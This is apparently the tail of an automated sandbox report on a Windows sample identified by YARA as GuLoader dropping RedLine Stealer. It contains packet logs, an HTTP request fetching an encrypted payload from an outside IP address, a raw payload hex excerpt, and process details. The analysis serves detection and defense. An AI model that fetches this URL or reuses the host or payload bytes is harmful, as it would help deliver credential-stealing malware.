                                                                                                                                                Dec 20, 2021 11:02:26.731772900 CET8049806185.112.83.8192.168.2.4
                                                                                                                                                Dec 20, 2021 11:02:26.731797934 CET8049806185.112.83.8192.168.2.4
                                                                                                                                                Dec 20, 2021 11:02:26.731829882 CET8049806185.112.83.8192.168.2.4
                                                                                                                                                Dec 20, 2021 11:02:26.731858969 CET8049806185.112.83.8192.168.2.4
                                                                                                                                                Dec 20, 2021 11:02:26.731865883 CET4980680192.168.2.4185.112.83.8
                                                                                                                                                Dec 20, 2021 11:02:26.731878996 CET8049806185.112.83.8192.168.2.4
                                                                                                                                                Dec 20, 2021 11:02:26.731899023 CET4980680192.168.2.4185.112.83.8
                                                                                                                                                Dec 20, 2021 11:02:26.731900930 CET8049806185.112.83.8192.168.2.4
                                                                                                                                                Dec 20, 2021 11:02:26.731924057 CET8049806185.112.83.8192.168.2.4
                                                                                                                                                Dec 20, 2021 11:02:26.731941938 CET8049806185.112.83.8192.168.2.4
                                                                                                                                                Dec 20, 2021 11:02:26.731946945 CET4980680192.168.2.4185.112.83.8
                                                                                                                                                Dec 20, 2021 11:02:26.731957912 CET8049806185.112.83.8192.168.2.4
                                                                                                                                                Dec 20, 2021 11:02:26.731966972 CET4980680192.168.2.4185.112.83.8
                                                                                                                                                Dec 20, 2021 11:02:26.731976986 CET8049806185.112.83.8192.168.2.4
                                                                                                                                                Dec 20, 2021 11:02:26.731993914 CET8049806185.112.83.8192.168.2.4
                                                                                                                                                Dec 20, 2021 11:02:26.732007980 CET4980680192.168.2.4185.112.83.8
                                                                                                                                                Dec 20, 2021 11:02:26.732011080 CET8049806185.112.83.8192.168.2.4
                                                                                                                                                Dec 20, 2021 11:02:26.732028961 CET8049806185.112.83.8192.168.2.4
                                                                                                                                                Dec 20, 2021 11:02:26.732040882 CET8049806185.112.83.8192.168.2.4
                                                                                                                                                Dec 20, 2021 11:02:26.732053995 CET8049806185.112.83.8192.168.2.4
                                                                                                                                                Dec 20, 2021 11:02:26.732063055 CET4980680192.168.2.4185.112.83.8
                                                                                                                                                Dec 20, 2021 11:02:26.732067108 CET8049806185.112.83.8192.168.2.4
                                                                                                                                                Dec 20, 2021 11:02:26.732079983 CET8049806185.112.83.8192.168.2.4
                                                                                                                                                Dec 20, 2021 11:02:26.732091904 CET8049806185.112.83.8192.168.2.4
                                                                                                                                                Dec 20, 2021 11:02:26.732105970 CET8049806185.112.83.8192.168.2.4
                                                                                                                                                Dec 20, 2021 11:02:26.732117891 CET8049806185.112.83.8192.168.2.4
                                                                                                                                                Dec 20, 2021 11:02:26.732302904 CET4980680192.168.2.4185.112.83.8
                                                                                                                                                Dec 20, 2021 11:02:26.732322931 CET4980680192.168.2.4185.112.83.8
                                                                                                                                                Dec 20, 2021 11:02:26.786734104 CET8049806185.112.83.8192.168.2.4
                                                                                                                                                Dec 20, 2021 11:02:26.786780119 CET8049806185.112.83.8192.168.2.4
                                                                                                                                                Dec 20, 2021 11:02:26.786806107 CET8049806185.112.83.8192.168.2.4
                                                                                                                                                Dec 20, 2021 11:02:26.786824942 CET8049806185.112.83.8192.168.2.4
                                                                                                                                                Dec 20, 2021 11:02:26.786844969 CET4980680192.168.2.4185.112.83.8
                                                                                                                                                Dec 20, 2021 11:02:26.786849976 CET8049806185.112.83.8192.168.2.4
                                                                                                                                                Dec 20, 2021 11:02:26.786874056 CET8049806185.112.83.8192.168.2.4
                                                                                                                                                Dec 20, 2021 11:02:26.786911011 CET8049806185.112.83.8192.168.2.4
                                                                                                                                                Dec 20, 2021 11:02:26.786941051 CET8049806185.112.83.8192.168.2.4
                                                                                                                                                Dec 20, 2021 11:02:26.786973000 CET8049806185.112.83.8192.168.2.4
                                                                                                                                                Dec 20, 2021 11:02:26.786993980 CET4980680192.168.2.4185.112.83.8
                                                                                                                                                Dec 20, 2021 11:02:26.786998987 CET8049806185.112.83.8192.168.2.4
                                                                                                                                                Dec 20, 2021 11:02:26.787029028 CET8049806185.112.83.8192.168.2.4
                                                                                                                                                Dec 20, 2021 11:02:26.787055969 CET8049806185.112.83.8192.168.2.4
                                                                                                                                                Dec 20, 2021 11:02:26.787082911 CET8049806185.112.83.8192.168.2.4
                                                                                                                                                Dec 20, 2021 11:02:26.787105083 CET8049806185.112.83.8192.168.2.4
                                                                                                                                                Dec 20, 2021 11:02:26.787115097 CET4980680192.168.2.4185.112.83.8
                                                                                                                                                Dec 20, 2021 11:02:26.787137985 CET8049806185.112.83.8192.168.2.4
                                                                                                                                                Dec 20, 2021 11:02:26.787147045 CET4980680192.168.2.4185.112.83.8
                                                                                                                                                Dec 20, 2021 11:02:26.787168980 CET8049806185.112.83.8192.168.2.4
                                                                                                                                                Dec 20, 2021 11:02:26.787189007 CET8049806185.112.83.8192.168.2.4
                                                                                                                                                Dec 20, 2021 11:02:26.787205935 CET4980680192.168.2.4185.112.83.8
                                                                                                                                                Dec 20, 2021 11:02:26.787209034 CET8049806185.112.83.8192.168.2.4
                                                                                                                                                Dec 20, 2021 11:02:26.787233114 CET4980680192.168.2.4185.112.83.8
                                                                                                                                                Dec 20, 2021 11:02:26.787235975 CET8049806185.112.83.8192.168.2.4
                                                                                                                                                Dec 20, 2021 11:02:26.787267923 CET8049806185.112.83.8192.168.2.4
                                                                                                                                                Dec 20, 2021 11:02:26.787280083 CET4980680192.168.2.4185.112.83.8
                                                                                                                                                Dec 20, 2021 11:02:26.787295103 CET8049806185.112.83.8192.168.2.4
                                                                                                                                                Dec 20, 2021 11:02:26.787321091 CET4980680192.168.2.4185.112.83.8
                                                                                                                                                Dec 20, 2021 11:02:26.787322998 CET8049806185.112.83.8192.168.2.4
                                                                                                                                                Dec 20, 2021 11:02:26.787343979 CET8049806185.112.83.8192.168.2.4
                                                                                                                                                Dec 20, 2021 11:02:26.787364960 CET8049806185.112.83.8192.168.2.4
                                                                                                                                                Dec 20, 2021 11:02:26.787364960 CET4980680192.168.2.4185.112.83.8
                                                                                                                                                Dec 20, 2021 11:02:26.787384987 CET4980680192.168.2.4185.112.83.8
                                                                                                                                                Dec 20, 2021 11:02:26.787385941 CET8049806185.112.83.8192.168.2.4
                                                                                                                                                Dec 20, 2021 11:02:26.787406921 CET8049806185.112.83.8192.168.2.4
                                                                                                                                                Dec 20, 2021 11:02:26.787427902 CET8049806185.112.83.8192.168.2.4
                                                                                                                                                Dec 20, 2021 11:02:26.787444115 CET4980680192.168.2.4185.112.83.8
                                                                                                                                                Dec 20, 2021 11:02:26.787447929 CET8049806185.112.83.8192.168.2.4
                                                                                                                                                Dec 20, 2021 11:02:26.787470102 CET8049806185.112.83.8192.168.2.4
                                                                                                                                                Dec 20, 2021 11:02:26.787472963 CET4980680192.168.2.4185.112.83.8
                                                                                                                                                Dec 20, 2021 11:02:26.787492037 CET8049806185.112.83.8192.168.2.4
                                                                                                                                                Dec 20, 2021 11:02:26.787501097 CET4980680192.168.2.4185.112.83.8
                                                                                                                                                Dec 20, 2021 11:02:26.787513018 CET8049806185.112.83.8192.168.2.4
                                                                                                                                                Dec 20, 2021 11:02:26.787534952 CET8049806185.112.83.8192.168.2.4
                                                                                                                                                Dec 20, 2021 11:02:26.787544966 CET4980680192.168.2.4185.112.83.8
                                                                                                                                                Dec 20, 2021 11:02:26.787554979 CET8049806185.112.83.8192.168.2.4
                                                                                                                                                Dec 20, 2021 11:02:26.787576914 CET8049806185.112.83.8192.168.2.4
                                                                                                                                                Dec 20, 2021 11:02:26.787587881 CET4980680192.168.2.4185.112.83.8
                                                                                                                                                Dec 20, 2021 11:02:26.787597895 CET8049806185.112.83.8192.168.2.4
                                                                                                                                                Dec 20, 2021 11:02:26.787617922 CET4980680192.168.2.4185.112.83.8

                                                                                                                                                HTTP Request Dependency Graph

                                                                                                                                                • 185.112.83.8

                                                                                                                                                HTTP Packets

                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                0192.168.2.449806185.112.83.880C:\Users\user\Desktop\o4XzTr73Ut.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                Dec 20, 2021 11:02:26.621887922 CET10005OUTGET /SoftwareCleanedPhilosf.bin HTTP/1.1
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                Host: 185.112.83.8
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Dec 20, 2021 11:02:26.676671028 CET10006INHTTP/1.1 200 OK
                                                                                                                                                Content-Type: application/octet-stream
                                                                                                                                                Last-Modified: Thu, 16 Dec 2021 20:58:22 GMT
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                ETag: "ba849aa9bff2d71:0"
                                                                                                                                                Server: Microsoft-IIS/10.0
                                                                                                                                                Date: Mon, 20 Dec 2021 10:02:22 GMT
                                                                                                                                                Content-Length: 190016
                                                                                                                                                Data Raw: df 3c 72 50 2f 15 40 e8 a3 15 52 1e b7 f2 43 e2 84 92 aa a4 14 52 32 3f 72 a5 32 35 b8 f4 5b 85 b7 bb cf 2f 60 98 3d 67 ce 9f 60 bf df 02 04 71 7d 03 17 93 73 d6 dd 25 45 26 b4 ca 7c db bb 41 e1 d6 8c 0d dd 89 55 65 99 55 d3 b1 eb 82 0a 28 31 df 1d ef e4 41 a0 e6 1f 8a 07 9d 0a 4d 3f 22 94 22 86 a8 09 70 58 3b 88 0c 1d 7e 11 92 9e 98 a2 92 f5 b6 9b fb e0 63 6f 5f 20 3f 61 e6 47 b2 7b 1c 03 70 2b 9e 0e 87 c0 ae f7 da 40 92 55 35 f4 4a 38 32 49 62 1c 40 6f fd 39 8d 83 37 bb 55 a4 fa 20 49 04 d4 44 3f 96 f6 92 78 d1 af 6d 73 fc bc d2 aa 98 c2 f7 cd 4c 38 9b 8e 5f 42 58 a1 56 d5 90 d6 8e 15 f6 56 05 8a d9 a6 88 39 f3 2e 5f b2 01 7d 44 f0 06 1e 98 60 eb b2 d6 32 88 47 35 11 37 ac 57 dc a5 f4 88 e9 ef 4c 61 15 e6 ba 19 b2 3b 88 d4 1e 4c 4b 8d 83 2e bb a7 ab b4 7c c3 cf 52 c7 29 54 cd b3 71 cf 7c b8 ed e2 7d 71 ba 65 a6 5a ce 94 5a 78 85 87 5c 9b fc c0 8d 11 c4 7b 6e d6 c6 37 20 79 b2 66 71 c6 c3 b9 e7 ab ac c5 9c 8f d6 d3 0b 99 65 30 3f 58 42 51 16 20 be 4d ab ca 68 c7 61 ca 04 89 ef 4c 23 fd da 7b 6f 96 c3 26 a9 f5 41 8a 24 78 cc 47 11 76 f8 d7 35 2b be 77 2a 4b 41 8b 75 ad e4 49 78 d3 56 61 49 b6 24 57 55 e3 01 10 0a c1 85 cb 24 61 5d e8 6b 07 bc 4a 02 f7 64 51 7f f2 82 40 29 25 39 0a 41 3d b8 c1 43 d9 59 4b d8 44 e5 b4 1c 47 4a 88 b4 94 44 09 59 62 56 76 c9 9f 43 ce ff 71 8b 02 bd e7 8d 64 9b b2 f4 cf 6f 02 dd d3 a8 91 f8 43 df 60 28 03 06 fb 93 29 35 f8 c9 50 9d 44 59 da 9f 04 9a bb 53 a4 09 33 84 bc d3 ec 8f 38 16 8e 08 d7 44 f4 23 94 66 68 59 f7 c9 5e 18 9d 53 ec 16 a5 50 96 71 66 63 f9 58 ee d8 02 9f 5f ef bc 24 52 44 d6 cd 89 b1 01 79 3c a6 d6 02 ea 78 d5 f3 2a ff 58 8e 7a 8f 74 0b 82 f7 03 42 be fa f4 93 cd 79 31 b4 3d 63 91 cc b7 5f 12 07 b8 ac c1 34 9b 21 9b 79 ee 5b 15 18 3a 42 19 75 2b ce 87 d8 75 4e 47 bb 6d 43 f6 fc 2b 23 f1 37 d8 23 79 b1 78 4b 0f 54 11 f6 d8 db 31 bf 67 26 84 41 bb 19 3e e6 dd 98 45 ff f0 ad 7e b2 20 04 ca c2 08 c1 08 49 9d 8b 0b ba 8d 53 9f 9c 1a 39 45 ca 83 0a 48 9b da b6 8c 6f b9 e0 07 dd 16 2f 52 16 4b ec 9c 94 ed 82 e8 25 bc f5 90 7f b1 9f 75 de de 44 1d 8e 83 e4 ab 76 ec 66 8b 1d 85 b7 38 10 7c 05 68 91 bf e1 47 50 64 6e 1a c3 6c a2 b5 89 7f cc b6 bf d0 08 f7 70 c3 56 fe ca 6e dd 58 08 7e bd 62 2c 33 a1 a7 32 00 18 e3 05 f5 91 fa 71 0b 7f 61 b7 58 12 a9 37 06 c3 d1 03 9d eb bf 07 2b 0a 5d 98 33 52 3b 97 77 9d 3e fb 46 e1 55 2f a4 bb 05 1d a3 64 74 04 13 0d e4 72 0d ae f7 dd 9c 36 56 2b e4 19 e2 f2 2f 2f d5 8a af 5b 49 f6 ca 20 3b 2f ca bc 67 81 ea fa 84 42 b1 ad b9 88 92 af 55 19 34 38 76 b5 36 98 5f 64 ad 02 ad f4 7f 00 52 3e 09 ca 7c f2 e7 71 de 94 e5 2b 3c 77 b8 66 95 75 91 b2 7c 23 83 db 65 ba e3 69 8f d1 b8 e1 49 c7 df f4 9e d6 53 2c ac 8c 1c 0d de 89 55 65 9d 55 d3 b1 14 7d 0a 28 89 df 1d ef e4 41 a0 e6 5f 8a 07 9d 0a 4d 3f 22 94 22 86 a8 09 70 58 3b 88 0c 1d 7e 11 92 9e 98 a2 92 f5 b6 9b fb e0 63 6f 5f 20 3f 81 e6 47 b2 75 03 b9 7e 2b 2a 07 4a e1 16 f6 96 8d b3 01 5d 9d 39 18 42 3b 0d 7b 32 0e 90 19 ee e2 59 d5 3a d0 da 42 2c 24 a6 31 51 b6 9f fc 58 95 e0 3e 53 91 d3 b6 cf b6 cf fa c7 68 38 9b 8e 5f 42 58 a1 3e c5 14 fb a2 64 1c 28 29 fb 33 d8 a4 48 19 50 6d 91 7e 03 7b 81 ec 60 93 d7 7a cc fd 43 62 39 19 60 dc d2 0b ad 4f 8a ba ca 81 32 7d 64 0c c4 2b 91 52 f6 76 6f a6 35 bf a0 55 c5 8a da 5e 02 91 a6 31 af 05 25 27 cd 71 cf 7c b8 ed e2 7d 71 ba 65 a6 5a ce 94 5a f3 7e da 3c 53 f2 c0
                                                                                                                                                Data Ascii: <rP/@RCR2?r25[/`=g`q}s%E&|AUeU(1AM?""pX;~co_ ?aG{p+@U5J82Ib@o97U ID?xmsL8_BXVV9._}D`2G57WLa;LK.|R)Tq|}qeZZx\{n7 yfqe0?XBQ MhaL#{o&A$xGv5+w*KAuIxVaI$WU$a]kJdQ@)%9A=CYKDGJDYbVvCqdoC`()5PDYS38D#fhY^SPqfcX_$RDy<x*XztBy1=c_4!y[:Bu+uNGmC+#7#yxKT1g&A>E~ IS9EHo/RK%uDvf8|hGPdnlpVnX~b,32qaX7+]3R;w>FU/dtr6V+//[I ;/gBU48v6_dR>|q+<wfu|#eiIS,UeU}(A_M?""pX;~co_ ?Gu~+*J]9B;{2Y:B,$1QX>Sh8_BX>d()3HPm~{`zCb9`O2}d+Rvo5U^1%'q|}qeZZ~<S


                                                                                                                                                Code Manipulations

                                                                                                                                                Statistics

                                                                                                                                                Behavior

                                                                                                                                                Click to jump to process

                                                                                                                                                System Behavior

                                                                                                                                                Analysis Process: o4XzTr73Ut.exe PID: 6892 Parent PID: 5320

                                                                                                                                                General

                                                                                                                                                Start time:10:59:48
                                                                                                                                                Start date:20/12/2021
                                                                                                                                                Path:C:\Users\user\Desktop\o4XzTr73Ut.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:"C:\Users\user\Desktop\o4XzTr73Ut.exe"
                                                                                                                                                Imagebase:0x400000
                                                                                                                                                File size:96864 bytes
                                                                                                                                                MD5 hash:F65536B785611D1B549E8D866FC898EE
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Yara matches:
                                                                                                                                                • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.843188696.00000000028A0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                Reputation:low

                                                                                                                                                Analysis Process: o4XzTr73Ut.exe PID: 6324 Parent PID: 6892

                                                                                                                                                General

                                                                                                                                                Start time:11:01:10
                                                                                                                                                Start date:20/12/2021
                                                                                                                                                Path:C:\Users\user\Desktop\o4XzTr73Ut.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:"C:\Users\user\Desktop\o4XzTr73Ut.exe"
                                                                                                                                                Imagebase:0x400000
                                                                                                                                                File size:96864 bytes
                                                                                                                                                MD5 hash:F65536B785611D1B549E8D866FC898EE
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:.Net C# or VB.NET
                                                                                                                                                Yara matches:
                                                                                                                                                • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000000C.00000000.841548004.0000000000560000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000C.00000002.1061972250.0000000020640000.00000004.00020000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000C.00000002.1061316952.000000001F5F7000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000C.00000002.1060215267.000000001E3E0000.00000004.00020000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000C.00000003.1004258087.000000000089A000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000C.00000002.1060066764.000000001E130000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                Reputation:low

                                                                                                                                                Disassembly

                                                                                                                                                Code Analysis

                                                                                                                                                Reset < >